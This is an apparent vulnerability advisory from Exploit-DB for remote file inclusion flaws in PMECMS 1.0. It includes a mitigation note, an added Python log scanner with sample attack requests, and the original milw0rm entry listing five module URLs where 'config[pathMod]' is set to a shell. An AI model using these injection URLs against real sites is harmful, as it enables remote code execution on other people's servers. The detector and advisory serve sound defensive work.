Vendor: PMECMS
By: GolD_M = [Mahmood_ali]
CVSS: 7.5 (HIGH)
CWE: Multiple Remote File Inclusion
Product Name: PMECMS
Affected Version From: 1
Affected Version To: 1
Patch Exists: NO
2007

PMECMS <= 1.0 Multiple Remote File Inclusion Vulnerabilities

PMECMS version 1.0 has multiple remote file inclusion vulnerabilities. An attacker can exploit them by manipulating the 'config[pathMod]' parameter in various module files to include malicious files from remote servers, which can lead to remote code execution and unauthorized access to sensitive information.

Mitigation:

The vendor has not provided a patch for these vulnerabilities. Users are advised to upgrade to a newer version of PMECMS or implement a web application firewall to filter and block malicious requests.
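
As an added example (not part of the original advisory or of PMECMS), the following Python script shows the kind of request filtering the mitigation refers to, applied to access logs: it flags entries where a client supplies 'config[pathMod]' to a /mod/<name>/index.php script. The log format, sample lines, hostnames and function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Request line inside a common/combined-format access-log entry (assumed format).
REQUEST_RE = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')
# Module entry points of the form listed in the advisory: /mod/<name>/index.php
MODULE_RE = re.compile(r"/mod/[^/]+/index\.php$", re.I)
# A value starting with a URL scheme or "//" points outside the local tree.
REMOTE_RE = re.compile(r"^\s*(?:[a-z][a-z0-9+.\-]*:|//)", re.I)
PARAM = "config[pathMod]"


def classify(log_line):
    """Return 'remote-value', 'param-present' or None for one log line."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return None
    target = urlsplit(m.group(1))
    if not MODULE_RE.search(unquote(target.path)):
        return None
    verdict = None
    # parse_qsl percent-decodes keys, so config%5BpathMod%5D is caught too.
    for key, value in parse_qsl(target.query, keep_blank_values=True):
        if key.strip().startswith(PARAM):
            if REMOTE_RE.match(value):
                return "remote-value"
            # The parameter should never be client-supplied, so note it anyway.
            verdict = "param-present"
    return verdict


def scan(lines):
    """Return (line_number, verdict) for every flagged line."""
    hits = [(n, classify(line)) for n, line in enumerate(lines, 1)]
    return [(n, v) for n, v in hits if v]


# Constructed sample log lines (documentation addresses and hostnames).
SAMPLE_LOG = [
    '203.0.113.5 - - [04/May/2007:10:00:00 +0000] "GET /mod/image/index.php?config[pathMod]=http://host.example.test/a.txt HTTP/1.1" 200 512',
    '203.0.113.5 - - [04/May/2007:10:00:02 +0000] "GET /cms/mod/liens/index.php?config%5BpathMod%5D=ftp%3A%2F%2Fhost.example.test%2Fa HTTP/1.1" 200 512',
    '198.51.100.9 - - [04/May/2007:10:01:00 +0000] "GET /mod/texte/index.php?config[pathMod]=../inc HTTP/1.1" 200 300',
    '198.51.100.9 - - [04/May/2007:10:02:00 +0000] "GET /mod/texte/index.php?id=4 HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for line_no, verdict in scan(SAMPLE_LOG):
        print(line_no, verdict)
```

The same two conditions (parameter present at all, value starting with a scheme) can be used as a blocking rule in a web application firewall.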

Exploit-DB raw data:

# PMECMS <= 1.0 Multiple Remote File Inclusion Vulnerabilities
# D.Script: http://www.pmecms.com/export/maj/PMECMS_Standard_os1.0.zip
# Discovered by: GolD_M = [Mahmood_ali]
# Homepage: http://www.Tryag.cc
# Exploit:[Path]/mod/image/index.php?config[pathMod]=Shell
# Exploit:[Path]/mod/liens/index.php?config[pathMod]=Shell
# Exploit:[Path]/mod/liste/index.php?config[pathMod]=Shell
# Exploit:[Path]/mod/special/index.php?config[pathMod]=Shell
# Exploit:[Path]/mod/texte/index.php?config[pathMod]=Shell
# And More Download Script ......!!!
# Greetz To: Tryag-Team ....##

# milw0rm.com [2007-05-04]